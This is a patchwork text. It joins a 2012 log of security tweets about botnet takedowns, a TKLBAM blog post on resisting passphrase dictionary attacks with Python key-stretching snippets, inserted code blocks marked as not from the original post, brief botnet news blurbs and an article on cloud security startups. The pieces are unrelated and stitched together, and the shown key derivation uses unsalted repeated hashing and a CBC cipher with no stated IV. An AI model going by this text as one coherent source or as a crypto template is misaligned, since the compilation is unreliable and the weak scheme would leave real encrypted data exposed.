2012-09-17 18:36:55 - ITVulnerability : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/x4Wr90qO
2012-09-17 07:58:02 - DarkOperator : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/jYx1eRko
2012-09-17 03:00:11 - darinandersen : Microsoft disrupts Nitol botnet, malware hidden in supply chain http://tco/rS3a8WoR
2012-09-16 21:11:08 - GFISoftware : Microsoft takes down another botnet, #Nitol http://tco/3bzq7bvk via @networkworld #Microsoft
2012-09-16 15:29:11 - securitypro2009 : Microsoft battles botnet preinstalled on systems | PCWorld http://tco/KoGdlw50
2012-09-15 12:32:37 - SearchSecurity : News: Microsoft disrupts Nitol botnet, outs hidden PC malware http://tco/GfiuejN8
2012-09-15 11:07:14 - theprez98 : Microsoft applies 'surgical sinkhole' to strangle botnet installed on new PCs http://tco/2w2UcrV3 #derbycon #nitol
2012-09-15 03:41:24 - watchguardtech : WatchGuard Security Week in Review Episode 33 is ready for viewing consumption Covers botnets, HTTPS attacks, APTs: http://tco/z8MWWe3N
2012-09-15 01:40:44 - obsequens : Microsoft disrupts Nitol botnet, outs hidden PC malware: The Nitol botnet controlled more than 500 strains of em http://tco/v3ne5UUr
2012-09-15 00:48:37 - SCmagazineUK : Microsoft disrupts Nitol botnet and takes control of malware hosting domain - SC Magazine UK http://tco/As24AQUw
2012-09-14 20:18:22 - SecAdept : WatchGuard Security Week in Review Episode 33 is ready for viewing consumption Covers botnets, HTTPS attacks, APTs: http://tco/pzwi5YBV
2012-09-14 19:18:11 - CSOonline : NEW: Microsoft downs botnet that infiltrated Chinese PC supply chain http://tco/8D4f2ukM
2012-09-14 18:21:09 - DarkOperator : 7 basic tips to protect your computer from botnet attacks http://tco/NKCKcrEN
2012-09-14 17:34:40 - ITDataSecurity : Microsoft disrupts Nitol botnet and takes control of malware hosting domain http://tco/LMIMfgIs SC Mag
2012-09-14 17:03:32 - watchguardtech : MS Digital Crimes Unit still kicking bot herder butt Way to go: http://tco/NtiutIaV That said, when one botnet dies, another is born
2012-09-14 13:02:48 - securitypro2009 : Microsoft disrupts millions of botnet connections after discovering PCs with http://tco/Sp6o3ExG
2012-09-14 12:29:27 - hackinthebox : Microsoft thwarts Nitol botnet with restraining order: Microsoft's Digital Crimes Unit was granted a restraining http://tco/P8gH0UNK
2012-09-14 08:25:53 - SecAdept : MS Digital Crimes Unit still kicking bot herder butt Way to go: http://tco/YiJLKHar That said, when one botnet dies, another is born
2012-09-14 06:39:54 - DarkOperator : Microsoft seizes Chinese botnet domain http://tco/P61upY8M
2012-09-14 06:39:54 - DarkOperator : Microsoft moves to quash counterfeit Windows botnet http://tco/2LjiiPPY
2012-09-14 06:39:54 - DarkOperator : Microsoft takes down botnet caused by malware that came in pirated versions of Windows http://tco/wpLMB3p1
2012-09-14 06:30:49 - msftsecresponse : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t
2012-09-14 06:01:22 - DaveMarcus : Microsoft zaps botnet found pre-installed with counterfeit Windows http://tco/6lekWO9f pre-pwn'd PCs
2012-09-14 05:49:57 - gianlucaSB : RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://
2012-09-14 04:26:55 - gollmann : RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://
2012-09-14 04:26:55 - gollmann : Nitol botnet takedown and 3322org - evasions already - http://tco/wFFRq9zu
2012-09-14 04:19:03 - tdirro : RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://
2012-09-14 04:10:54 - taosecurity : @pboin ATT CSO book called botnets clearly the most important security issue on the Internet today http://tco/l0Nih8eK Now I understand
2012-09-14 03:22:14 - EvilFingers : Microsoft Carries out Nitol Botnet Takedown: A botnet known as Nitol, built on the backs of PCs and laptops load http://tco/AVssL6Le
2012-09-14 02:14:11 - DarkReading : Microsoft intercepts 'Nitol' botnet 70,000 malicious domains in court-ordered sinkhole operation: http://tco/XbdiH9sS
2012-09-14 01:34:42 - teksquisite : Microsoft thwarts Nitol botnet with restraining order http://tco/ONRv2kK4
2012-09-14 00:37:24 - patrikrunald : Microsoft takes over 3322org domain as part of Nitol botnet disruption http://tco/8mZ8hwn6 This is great news
2012-09-13 23:46:29 - jaysonstreet : RT @briankrebs: Microsoft disrupts 'Nitol' botnet, says malware was pre-loaded onto machines sold in China with pirated OSes http://tc
2012-09-13 23:35:46 - GarWarner : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t
2012-09-13 23:01:42 - craiu : RT @codelancer: The order allows Microsoft to host the 3322 org, which hosted the Nitol botnet http://tco/aKrrAqay bye 3322, i'll miss you
2012-09-13 23:01:42 - craiu : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t
2012-09-13 22:46:00 - CanDeger : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/k4QqQQrJ
2012-09-13 22:21:08 - sans_isc : Diary Microsoft disrupts traffic associated with the Nitol botnet, Thu, Sep 13th: There is an inter http://tco/ShIxFsPO #sansisc
2012-09-13 22:12:33 - helpnetsecurity : Microsoft's study into unsecure supply chains leads to botnet disruption - http://tco/D4ID2ynv
2012-09-13 21:40:51 - DarkOperator : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/9AmNo768
2012-09-13 21:40:51 - DarkOperator : Microsoft zaps botnet found pre-installed with counterfeit Windows http://tco/G4MhQKXo
2012-09-13 21:30:44 - briankrebs : Microsoft disrupts 'Nitol' botnet, says malware was pre-loaded onto machines sold in China with pirated OSes http://tco/QIFhNO9x
2012-09-13 20:42:58 - shelleehale : Microsoft taking on aggressive new Nitol botnet http://tco/lGUVTbrg via @komonews
2012-09-13 20:20:39 - nicolasbrulez : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/S2I5KouG
2012-09-13 19:26:14 - gollmann : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/kUPdYZ3C
2012-09-13 19:26:14 - gollmann : 3322 org loss will disable a lot of botnets Bad guys are looking for next DDNS provider already
2012-09-13 19:26:14 - gollmann : The DDNS provider 3322 org loses domain to Microsoft That'll screw a few hundred botnet operators Access logs will nail em
2012-09-13 19:26:14 - gollmann : If you're a botnet operator inconvenienced by M$ with the 3322 takedown, advice on fix from Pubyun http://tco/qzGAaut3 to carry on
2012-09-13 17:16:09 - grecs : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet more than 500 additional strains of malware in latest op http://tco/NQ0GSf24
2012-09-13 17:15:14 - ITVulnerability : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/3GMhUIWs
2012-09-13 07:49:01 - 2gg : RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Server Part 2 http://tco/V0fEQRQQ #malware #botnet #cybercrime
2012-09-13 00:44:22 - y0ug : RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Server Part 2 http://tco/V0fEQRQQ #malware #botnet #cybercrime
2012-09-12 13:18:28 - xanda : RT @artem_i_baranov: In process of botnet case investigation, old DrWeb sinkhole servers were found, lol http://tco/V0fEQRQQ #malware
2012-09-12 02:31:33 - 2gg : RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Executable Part 1 http://tco/6azxKujz #malware #botnet #cybercrime
2012-09-11 12:42:15 - rmogull : We DDoSed Godaddy using a botnet composed completely of iPhone 5s Details at http://tco/BOa6eTRc
2012-09-11 11:38:50 - armorguy : RT @rmogull: We DDoSed Godaddy using a botnet composed completely of iPhone 5s Details at http://tco/mf3NjzPf -On the web so must be true
2012-09-11 05:23:43 - 2gg : RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy
2012-09-11 04:00:59 - gianlucaSB : RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy
2012-09-11 03:23:07 - nicolasbrulez : RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy
2012-09-11 00:49:17 - xanda : RT @aszy: Protecting web service from botnet exploitations http://tco/UcXyOJB9
2012-09-10 19:46:06 - dpwallace : Hacker gets 30 months for botnet that hit 72,000 PCs #security #legal http://tco/fBKitarj via @itproportal
2012-09-10 13:40:16 - aszy : Protecting web service from botnet exploitations http://tco/PzcwOzHG
2012-09-10 13:17:05 - DarkOperator : Hacker gets 30 months for botnet that hit 72,000 PCs http://tco/jNXnPpiH
2012-09-08 18:42:14 - ITDataSecurity : Former botnet controller sentenced to 30 months in the US http://tco/bcrPJJqc SC Mag
2012-09-08 11:19:36 - LogTalk : Reading -- Arizona man imprisoned for selling access to botnets http://tco/L0lwB2Yp via @networkworld
2012-09-08 10:28:24 - SCmagazineUK : Former botnet controller sentenced to 30 months in the US - SC Magazine UK http://tco/DGfFKSi0
2012-09-08 00:41:14 - helpnetsecurity : Arizona man goes to prison for selling access to botnets - http://tco/qDPFLUpG
2012-09-07 23:32:53 - DarkOperator : Hacker convicted for selling a botnet http://tco/E3reRuRx
2012-09-07 21:53:25 - ITDataSecurity : Former botnet controller sentenced to 30 months in the US http://tco/C4FoAzgB SC Mag
2012-09-07 12:06:29 - hackinthebox : Botnet master gets 30-month prison term for renting out infected PCs: A hacker who controlled a botnet of 72,000 http://tco/ixKDzY6G
2012-09-07 00:30:48 - DarkOperator : Advances in botnet detection via DNS traffic http://tco/CPJwlHmY
2012-09-07 00:27:26 - madirish2600 : Should probably revisit my opsec after logging into a botnet CC and subtly mocking the operators
2012-09-06 22:34:02 - CERTXMCO : RT @botnets_fr: RT @ericfreyss Java vulnerability CVE-2012-4681 – What if we finally took responsibility « Blog Criminalités numériques
2012-09-06 22:21:20 - netForensics : http://tco/DARfhMBC The virus activity in August 2012: the growing botnets Java vulnerabilities and new threats to Android September 3,
2012-09-06 22:19:51 - ITDataSecurity : Setting up a botnet is easier than you think http://tco/xbjzXDXy Computer Weekly
2012-09-06 19:14:06 - Kleissner : Interesting My Citadel sinkhole of one botnet shows me 100 percent infections are in Netherlands, Norway, Finland and Germany
2012-09-06 12:22:59 - i0n1c : Oh yeah and I welcome the fefe botnet
2012-09-06 09:41:24 - TeMerc : RT @eSecurityP: McAfee warns of botnet malware that spreads through chat incl ICQ, Skype, GTalk, Pidgin, MSN, YIM Facebook http:
2012-09-06 06:27:59 - GarWarner : @MalwareMustDie - awesome work you are doing Just saw your site thanks to botnetsfr
2012-09-06 02:36:34 - RSAConference : #RSAC EU 2012 preview: No followers No botnet No problem Asymmetric denial of service attacks ft Bryan Sullivan http://tco/5133HqNV
2012-08-18 07:49:56 - DarkOperator : Spamhaus announces the death of the Grum botnet, but Festi emerges http://tco/nTAk8gpb
2012-08-14 17:41:46 - ericfreyss : RT @botnets_fr: An article by @briankrebs that notably includes elements collected by @kafeine of botnetspointfr http://tco/Q
2012-08-10 15:42:23 - UnderNews_fr : New comment published: The person behind the Bredolab botnet is sentenced to prison http://tco/R3a4ei1b
2012-08-09 02:40:00 - SophosLabs : Suspected Mariposa botnet mastermind goes on trial http://tco/MMgqDZJv
2012-08-08 12:14:39 - AlertBoot : Infosec - Suspected Mariposa botnet mastermind goes on trial http://tco/Y3G3awum
2012-08-08 11:24:34 - ericfreyss : RT @STA_English: 26-year-old Slovenian hacker Iserdo stands accused of being the mastermind behind the Mariposa botnet in trial that s
2012-08-08 09:10:51 - HenkvanRoest : Suspected Mariposa botnet mastermind goes on trial http://tco/5EAO5pkG
2012-08-08 05:49:17 - ITVulnerability : Suspected Mariposa botnet mastermind goes on trial http://tco/OuBCKPET
2012-08-08 05:04:17 - securitypro2009 : Prototype system goes after DNS-based botnets http://tco/y9SBVCEa
2012-08-07 23:26:42 - gcluley : Suspected Mariposa botnet mastermind goes on trial http://tco/3hhZRLmQ
2012-08-07 16:57:44 - 2gg : All your botnet are belong to us http://tco/19ZpCEL2
2012-08-06 22:25:03 - daveaitel : RT @dwaaan: so i heard @Panda_security provides premier IRC shells for botnet hosting
2012-08-06 16:00:57 - ITDataSecurity : Easily available tools, botnets contribute to DDoS rise http://tco/pIX1lD3e SC Mag
2012-08-06 12:34:34 - Kleissner : Interesting, found a 4th TinyBanker botnet Used to use http://tco/PxCpdCZT as CC All 4 Tinba botnets are permanently down though
2012-08-05 17:33:49 - DarkOperator : Easily available tools, botnets contribute to DDoS rise http://tco/IfECTAlz
2012-08-05 04:51:15 - SecurityTube : News Easily available tools, botnets contribute to DDoS rise http://tco/0E3SBTeO
2012-08-04 23:58:33 - kellepc : RT @SecMash: #InfoSec Easily available tools, botnets contribute to DDoS rise http://tco/fSP6rFCp #CyberSecurity
2012-08-04 23:20:45 - JGamblin : @mikko if not every distributed cloud service is a botnet The word is lost to a negative meaning, just like hacker
2012-08-04 21:39:13 - lostinsecurity : @mikko I'd say yes, although its intentions are benign At the same, any AV is a botnet too
2012-08-04 21:12:20 - dakami : @Propachlor @mikko @voltheir yeah but anon botnets interact with other nodes very nonconsensually
2012-08-04 11:33:20 - FSecure : RT @mikko: Do you consider Microsoft Update to be a botnet And if not, why not
2012-08-02 10:28:58 - nullcon : nullcon Delhi: Releasing framework AEF for exploitation, malware and botnets research/testing on Android devices http://tco/muP6hn8X
2012-08-02 01:49:02 - DarkReading : More than 1/2 of top 20 F500 firms infected with 'Gameover' Zeus botnet: http://tco/9fhWLB4Q #Blackhat
2012-07-31 23:04:51 - securitypro2009 : Could end of email spam be in sight after collapse of Grum botnet http://tco/gQRLLDrr
2012-07-31 10:50:21 - Proofpoint_Inc : Spam volume looks to decrease after shutdown of major botnet http://tco/gwRiuHvK via @ProofpointNews
2012-07-31 10:50:21 - Proofpoint_Inc : In the blog: How the takedown of the Grum botnet impacted spam volumes, some musings about the future of botnets http://tco/AikNhf5z
2012-07-31 09:03:44 - SCforum : RT @ESET: P2P 'Gameover ZeuS' seen as largest bank-theft botnet http://tco/IIxrB29P
2012-07-31 08:20:13 - 2gg : I just cracked unnamed Storm Dogod Chinese botnet builder It was piece of cake : http://tco/cHEAEett
Passphrase dictionary attack countermeasures in tklbam's keying mechanism

Background: how a backup key works

In TKLBAM the backup key is a secret, encrypted with a passphrase, which is uploaded to the Hub. Decrypting the backup key yields the secret, which is passed on to duplicity (and eventually to GnuPG) to be used as the symmetric key with which backup volumes are encrypted on backup and decrypted on restore.

When you create a new backup, or change the passphrase on an existing backup, a new backup key is uploaded to the Hub where it is stored in the key field for that backup record.

When you restore, tklbam downloads the backup key from the Hub and decrypts it locally on the computer performing the restore. Note that the Hub only allows you to download the backup key for backup records to which you have access (e.g., you are the owner).

Only you can decrypt your passphrase-protected backups

All of this matters because it means that as long as you use a passphrase to protect the key, even the Hub can't decrypt your backups, only you can - provided you remember the passphrase (or failing that, at least have the escrow key stored in a safe place).

In other words, the decryption of the backup key happens locally and at no point does the passphrase reach the Hub, so we can't decrypt your backup even if you asked us to. Neither can an attacker that has theoretically compromised the Hub, or a government agency that comes kicking down our door with a court warrant.

The problem with cryptographic passphrases

But wait. If an attacker has local access to the key, his ability to run dictionary attacks to find the key's passphrase is limited only by the computational resources he can throw at it.

Remember that there's a critical difference between a passphrase used for authentication (e.g., to an online service) and a passphrase used for cryptographic purposes.

A passphrase used for authenticating to an online service doesn't need to be as strong as one used cryptographically, because with an online service, even if no explicit countermeasures are in place (e.g., IP blacklisting after too many failed attempts), there is still a network between the attacker and the service. The available bandwidth places a debilitating upper limit on how many passphrases can be tried per second, and in practice there are usually bottlenecks elsewhere that slow down an online dictionary attack even further.

But a passphrase used for cryptographic purposes must assume the attacker already has the ciphertext, and that's a whole different ball game.

To better understand what we're up against, here's the formula for calculating the size of the passphrase search space:

log(howmany_different_possible_values ** howmany_values) / log(2)

For example, consider a typical 6 letter password.

6 printable ASCII characters = a maximum of 42 bits of search space.

That's a maximum of 4 trillion possible combinations. Which sounds like a lot. But it really isn't, since:

  1. You can probably squeeze out about 1 million local passphrase tests per second from a modern multi-core workstation, assuming a typical passphrase encryption method is used.

  2. This is one of those problems that are trivial to parallelize.

    If you rent just 100 computers (e.g., in the cloud) you could exhaustively search through 42 bits in about 5 days.

    And remember, today the bad guys often have millions of computers at their disposal via botnets.

  3. People are very bad at choosing truly random passwords. A clever attacker will try the low hanging fruit first, so they're likely to find out your passphrase much sooner than by brute forcing blindly through the full search space.

    For example, say you know a 6 letter password is much too short for an encryption key and instead you're using a longer random combination of 10,000 common English words:

    • 2 words = 18-bits worth of search space.
    • 3 words = 27-bits worth of search space.
    • 4 words = 36-bits worth of search space.

    English words aren't very random so your "paranoid" 3 word, 17 letter passphrase may actually be easier to crack than a truly random combination of just 4 ASCII printable characters (28-bits).

    For comparison, let's see what happens if you use 6 random individual characters.

    If you just use random lowercase characters the search space is reduced to 27-bits which is 32,768 times easier to search through than the full 42-bit search space of 6-letter ASCII printable passwords.

    If you just use random lowercase characters and numbers, the search space is 30-bits which is 4,096 times easier to search through.

    If you just use random lowercase and uppercase characters and numbers, the search space is 35-bits which is 128 times easier to search through.

The good news is that each bit of search space doubles the expense for the attacker.

The bad news is that it takes a truly random combination of 11 uppercase and lowercase characters and numbers just to reach 64-bits worth of search space, and a 10M strong botnet could crack even that in an average of 10 days.

Bottom line: even your supposedly ultra-paranoid passphrase (e.g., r0m4n14nv4mp1r344rdv4rkn3st) of 4 random words from a dictionary of 150K words (in l33t speak) only has about 50-bits worth of entropy, despite being 27 characters long. A 10,000 botnet could crack that in about a day.
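To put the bit counts above and the cost multipliers of the countermeasures described in the next section on one scale, here is an added example (not from the original post) that evaluates the post's log2 formula for several alphabets and converts the result into attacker time at a given guess rate. The alphabet sizes and guess rates are assumptions chosen to line up with the figures in the text (the 42-bit figure corresponds to 128 symbols).

```python
import math

# Alphabet sizes are constructed for this example; the post's "ASCII
# printable" 42-bit figure for 6 characters corresponds to 128 values.
ALPHABETS = {
    "7-bit ASCII (128)": 128,
    "lowercase": 26,
    "lowercase+digits": 36,
    "mixed case+digits": 62,
    "10,000-word list": 10_000,
}


def search_space_bits(alphabet_size, length):
    """The post's formula log(size ** length) / log(2), computed as
    length * log2(size) so huge exponents never overflow a float."""
    if alphabet_size < 2 or length < 1:
        raise ValueError("need at least 2 symbols and 1 position")
    return length * math.log2(alphabet_size)


def seconds_to_exhaust(bits, guesses_per_second):
    """Worst-case time to try every candidate; the average is half of this."""
    return 2.0 ** bits / guesses_per_second


def stretched_guess_rate(raw_rate, hash_repeats, cipher_repeats):
    """Guess rate once every candidate costs `hash_repeats` hash passes plus
    `cipher_repeats` cipher passes instead of one hash: both countermeasures
    add linearly to the per-guess cost."""
    return raw_rate / (hash_repeats + cipher_repeats)


def days(seconds):
    return seconds / 86_400


def cost_table(length, per_machine_rate, machines):
    """Rows of (alphabet, bits, days to exhaust) for an attacker with
    `machines` boxes each making `per_machine_rate` guesses per second."""
    rate = per_machine_rate * machines
    rows = []
    for name, size in ALPHABETS.items():
        bits = search_space_bits(size, length)
        rows.append((name, round(bits, 1),
                     round(days(seconds_to_exhaust(bits, rate)), 3)))
    return rows


if __name__ == "__main__":
    # 100 rented machines at the post's assumed 1 million guesses/s each
    for name, bits, d in cost_table(6, 1_000_000, 100):
        print(f"{name:20s} {bits:5.1f} bits  {d:14.3f} days to exhaust")
    # 1.6M keys/s on four cores drops to 16/s with 100,000 hash repeats,
    # and to 8/s once 100,000 cipher repeats are added on top
    print(stretched_guess_rate(1_600_000, 100_000, 0),
          stretched_guess_rate(1_600_000, 100_000, 100_000))
```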

Countermeasures: increase computational cost

Though it's impossible to prevent these attacks entirely, I've implemented a couple of countermeasures in the way TKLBAM generates passphrase protected keys:

1) The first trick: increase how computationally expensive it is to calculate the cipher key from the passphrase:

import hashlib

def _repeat(f, input, count):
    # Feed f's output back into itself `count` times (count = 0 returns input unchanged).
    for x in range(count):
        input = f(input)
    return input

def _cipher_key(passphrase, repeats):
    # Stretch the passphrase (bytes) into a 256-bit AES key by iterating
    # SHA-256 `repeats` times; every guess an attacker makes pays the same cost.
    cipher_key = _repeat(lambda k: hashlib.sha256(k).digest(),
                         passphrase, repeats)
    return cipher_key

The principle is that calculating a hash costs CPU time so by feeding the hash into itself enough times we can linearly increase how expensive it is to map the passphrase-space to the key-space.

For example, repeating the hash routine 100,000 times takes about a quarter second on one of the cores of my computer. If I use all 4 cores this limits me to generating 16 cipher keys per second. Down from 1.6 million cipher keys per second. So that's one way to dramatically reduce the practical feasibility of a dictionary or exhaustive brute force attack.

Note that an attacker can't circumvent this calculation by searching through the key-space directly, because even after we increase the cost of generating the passphrase space 100,000 times over, the cost of trying to brute force the 256-bit key-space directly is still countless trillions of times greater.

The weakness of this technique is that an attacker would have to pay the cost of mapping the passphrase-space (e.g., a dictionary) to the key-space only once when trying to crack multiple keys.

2) The second trick: increase how computationally expensive it is to decrypt the key packet by increasing the number of times we pass it through encryption:

from Crypto.Cipher import AES  # PyCrypto

def _cipher(cipher_key):
    # A fresh CBC cipher object for every pass; no IV is passed, so the library default applies.
    return AES.new(cipher_key, AES.MODE_CBC)

# _repeat and cipher_key come from the previous snippet; _pad (block-size padding),
# plaintext and cipher_repeats are defined elsewhere in the module.
ciphertext = _repeat(lambda v: _cipher(cipher_key).encrypt(v),
                     _pad(plaintext), cipher_repeats)

This part of the computational expense is key-specific so trading off memory to pre-calculate the mapped key-space won't help you with this step.

Implementation notes

Embedding repeat parameters in the key packet

The current implementation hardwires 100,000 repeats of the hash, and another 100,000 repeats of the cipher.

This makes searching through the passphrase-space about 200,000 times more expensive. On my workstation it takes 0.5 seconds to encrypt or decrypt a key (per-core).

I'm not sure these are the ideal parameters but they are in the ball park of how much you can increase the computational expense before usability suffers.

That's not to say you couldn't go higher, but there's a practical upper boundary to that too. If you're willing to wait about a minute for key generation/decryption you could increase the computational expense about 100 times over and that would give you 100 times better protection or allow you to use a password that is 100 times weaker with the same protection.

Just in case, to allow the number of repeats to change or be user configurable in the future, the key formatter routine embeds the repeat parameters into the unencrypted portion of the key packet. This allows the key parsing routine to extract these parameters from the key itself, so it can just as easily parse a 0.5 second key (i.e., the current default) as a 5 second or 50 second key.

Embedding a version id

Just to make sure the key format is future proof I'm also embedding a version id into it.

Embedding a version costs almost nothing (an extra byte) and makes it easier to support incompatible changes to the key format should the need arise (e.g., changing of cipher/hash, changing the format, etc.).

Worst case scenario, we increment the version and implement a new incompatible key format. Old clients won't be able to understand the new key format but will at least fail reliably, and new clients will be able to support both new and old key formats.
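An added example (not TKLBAM's own code) of a key-packet formatter and parser that carries a version byte and both repeat counts in the clear, together with the repeated-SHA-256 stretching from the first trick. The exact header layout (a 1-byte version followed by two big-endian 32-bit counts) is my assumption, and the AES-CBC wrapping step is left out so the block runs on the standard library alone.

```python
import hashlib
import struct

# Header layout assumed for this example: the post only says that a one-byte
# version id and the two repeat counts live in the unencrypted part.
#   version (1 byte) | hash_repeats (uint32 BE) | cipher_repeats (uint32 BE) | encrypted key
HEADER = struct.Struct(">BII")
CURRENT_VERSION = 1
DEFAULT_HASH_REPEATS = 100_000    # the post's hard-wired defaults
DEFAULT_CIPHER_REPEATS = 100_000


class UnsupportedKeyFormat(ValueError):
    """Raised so an old client fails reliably on a packet it cannot read."""


def stretch(passphrase: bytes, hash_repeats: int) -> bytes:
    """Trick 1: feed SHA-256 into itself `hash_repeats` times to turn the
    passphrase into a 256-bit cipher key. There is no salt, which is the
    precomputation weakness the post itself points out."""
    if hash_repeats < 1:
        raise ValueError("hash_repeats must be >= 1")
    digest = passphrase
    for _ in range(hash_repeats):
        digest = hashlib.sha256(digest).digest()
    return digest


def format_packet(encrypted_key: bytes,
                  hash_repeats: int = DEFAULT_HASH_REPEATS,
                  cipher_repeats: int = DEFAULT_CIPHER_REPEATS) -> bytes:
    """Prepend version and repeat parameters so a parser can recover them
    without knowing which defaults were in force when the key was made."""
    return HEADER.pack(CURRENT_VERSION, hash_repeats, cipher_repeats) + encrypted_key


def parse_packet(packet: bytes):
    """Return (hash_repeats, cipher_repeats, encrypted_key). Truncated headers
    and unknown versions raise a clear error instead of yielding garbage."""
    if len(packet) < HEADER.size:
        raise UnsupportedKeyFormat("packet shorter than header")
    version, hash_repeats, cipher_repeats = HEADER.unpack_from(packet)
    if version != CURRENT_VERSION:
        raise UnsupportedKeyFormat(f"key format version {version} not supported")
    return hash_repeats, cipher_repeats, packet[HEADER.size:]


def is_readable(packet: bytes) -> bool:
    """True if this client understands the packet's version and header."""
    try:
        parse_packet(packet)
        return True
    except UnsupportedKeyFormat:
        return False


def work_factor(packet: bytes) -> int:
    """How many times more expensive one passphrase guess is than a single
    hash: the sum of the two repeat counts embedded in the packet."""
    hash_repeats, cipher_repeats, _ = parse_packet(packet)
    return hash_repeats + cipher_repeats


def cipher_key_for(packet: bytes, passphrase: bytes) -> bytes:
    """Derive the key needed to unwrap `packet`, using the hash repeat count
    the packet itself carries rather than a client-side constant."""
    hash_repeats, _, _ = parse_packet(packet)
    return stretch(passphrase, hash_repeats)


if __name__ == "__main__":
    # constructed sample: pretend these 32 bytes are the AES-wrapped backup key
    blob = bytes(range(32))
    pkt = format_packet(blob, hash_repeats=1_000, cipher_repeats=1_000)
    print(work_factor(pkt), cipher_key_for(pkt, b"correct horse battery").hex())
    newer = bytes([CURRENT_VERSION + 1]) + pkt[1:]
    print("old client can read newer packet:", is_readable(newer))
```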


          What a botnet is and what it is for        
A botnet, or network of robots or zombies, is a network of computers infected with remote-access malware that waits for an order to attack a target. That order normally comes from the owner of the zombie network, and the target is normally servers, web or otherwise, running heavily used services such as Netflix, […]
          Bad malware storms brewing        
ADTMAG.com has an interesting article talking of the convergence of spyware and more sophisticated phishing attacks. They talk about the convergence of viruses and spam engines that happened in 2003 as a real shift in the dynamic of WHERE junk mail was coming from. Today botnets account for about 90% of the spam online, and [...]
           The botnet: webs of hegemony/zombies who publish         
Eve, Martin Paul (2013) The botnet: webs of hegemony/zombies who publish. In: Zombies in the academy: living death in higher education. Intellect Press, Bristol. ISBN 9781841507149
          03.03.2008 IDG.pl news digest - audio version         
Today on IDG.pl: Vista's low popularity is the fruit of past mistakes; Six botnets are spamming us; CeBIT: a trade fair under the banner of ecology; Mozilla Firefox 4 - it's here; Intel's "Atomic" processors;
          22.02.2008 IDG.pl news digest - audio version         
Today on IDG.pl: Microsoft opens up and stops threatening with patents; Vista SP1 x64 - the confusion grows; ODF and OOXML supporters should cooperate; Canada: an anti-botnet operation with a Polish accent; The end of compatibility in the PS3;
          Time to check your DNS settings?        
On Wednesday, the German Federal Office for Information Security (BSI) published a press release advising users to recheck DNS server settings on their computers. This recommendation is related to the successful botnet takedown – dubbed ‘Operation Ghost Click’ – led by the FBI during November 2011. The bad guys behind this botnet had infested approximately 4 ...
This topic first appeared in the Spiceworks Community.
          Suspended Sentence for Mirai Botmaster Daniel Kaye        
Last month, KrebsOnSecurity identified U.K. citizen Daniel Kaye as the likely real-life identity behind a hacker responsible for clumsily wielding a powerful botnet built on Mirai, a malware strain that enslaves poorly secured Internet of Things (IoT) devices for use in large-scale online attacks. Today, a German court issued a suspended sentence for Kaye, who now faces related cybercrime charges in the United Kingdom.
          The Coming Wave of Cloud Security Startups        
This is a reprint of an article I wrote this week for MIT Technology Review.

Our growing computer security problems will create many new companies.

The threat from cyber-intrusions seems to have exploded in just the last 18 months. Mainstream media now report regularly on massive, targeted data breaches and on the digital skirmishes waged among nation states and cybermilitants.

Unlike other looming technical problems that require innovation to address, cybersecurity never gets solved. The challenges of circuit miniaturization, graphical computing, database management, network routing, server virtualization, and similarly mammoth technical problems eventually wane as we tame their complexity. Cybersecurity is a never-ending Tom and Jerry cartoon. Like antibiotic-resistant bacteria, attackers adapt to our defenses and render them obsolete.

As in most areas of IT and computing, innovation in security springs mostly from startup companies. Larger systems companies like Symantec, Microsoft, and Cisco contribute to the corpus of cybersecurity, but mostly acquire their new technologies from startups. Government agencies with sophisticated cyberskills tend to innovate more on the offensive side. I think that in the coming years we will see many small, creative teams of security engineers successfully discovering, testing, and building out clever new ways to secure cyberspace.

Anyone looking to found or invest in one of those small security companies destined for success should focus on the tsunami of change rocking the IT world known as cloud computing. In a transformation that eclipses even the advent of client–server computing in the 1980s, businesses are choosing to subscribe to services in the cloud over running software on their own physical servers. Incumbents in every category of software are being disrupted by cloud-based upstarts. According to Forrester, the global market for cloud computing will grow more than sixfold this decade, to over a quarter trillion dollars.


Cloud security, as it is known, is today one of the less mature areas of cloud computing, but it has already become clear that it will become a significant chunk of that vast new market. A Gartner report earlier this year predicted that the growth of cloud-based security services would overtake traditional security services in the next three years.

Just like other software products, conventional security appliances are being replaced by cloud-based alternatives that are easier to deploy, cheaper to manage, and always up-to-date. Cloud-based security protections can also be more secure, since the vendor can correlate events and profile attacks across all of its customers’ networks. This collaborative capability will be critical in the coming years as the private sector looks to government agencies like the National Security Agency for protection from cyberattacks.

The cloud also enables new security services based on so-called big data, which could simply not exist as standalone products. Companies like SumoLogic can harvest signals from around the Web for analysis, identifying attacks and attackers that couldn’t be detected using data from a single incident or source.

These new data-centric, cloud-based security products are crucial to solving the challenges of keeping mobile devices secure. Most computers shipped today are mobile devices, and they make juicier targets than PCs because they have location and payment data, microphones, and cameras. But mobile carriers and employers cannot lock down phones and tablets completely because they are personal devices customized with personal apps. Worse, phones and tablets lack the processing power and battery life to run security processes as PCs do.

